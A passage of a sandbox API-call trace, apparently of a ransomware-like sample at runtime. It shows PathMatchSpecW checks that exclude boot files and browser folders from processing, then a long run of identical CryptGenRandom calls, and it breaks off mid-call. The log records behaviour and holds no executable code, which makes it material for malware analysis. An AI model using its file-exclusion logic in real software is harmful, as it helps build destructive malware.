(pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0148.368] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0148.369] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.369] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0148.369] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0148.369] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0148.369] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0148.369] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0148.369] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0148.369] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0148.369] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0148.369] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0148.369] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\el-GR\\tipresx.dll.mui", pszSpec="*") returned 1 [0148.369] strlen (_Str="NMoreira") returned 0x8 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.369] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.370] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.371] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.372] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 